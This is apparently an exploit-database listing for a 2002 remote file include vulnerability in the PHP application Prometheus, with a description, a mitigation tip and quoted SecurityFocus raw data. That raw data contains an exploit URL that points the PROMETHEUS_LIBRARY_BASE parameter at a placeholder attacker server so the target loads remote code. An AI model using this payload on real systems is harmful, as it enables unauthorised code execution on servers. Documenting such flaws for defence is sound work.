header-logo
Suggest Exploit
vendor:
Prometheus
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Prometheus
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Prometheus Remote File Include Vulnerability

Prometheus is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Prometheus. An attacker may exploit this by supplying a path to a malicious 'autoload.lib' file on a remote host as a value for the 'PROMETHEUS_LIBRARY_BASE' parameter.

Mitigation:

Ensure that the application is not vulnerable to remote file inclusion attacks by validating user-supplied input and restricting the types of files that can be included.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6087/info

Prometheus is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Prometheus. An attacker may exploit this by supplying a path to a malicious 'autoload.lib' file on a remote host as a value for the 'PROMETHEUS_LIBRARY_BASE' parameter. 

http://target.server/prometheus-all/index.php?PROMETHEUS_LIBRARY_BASE=
http://attackers.server/&PHP_AUTO_LOAD_LIB=0

Navigation

Suggest Exploit

Services By CQR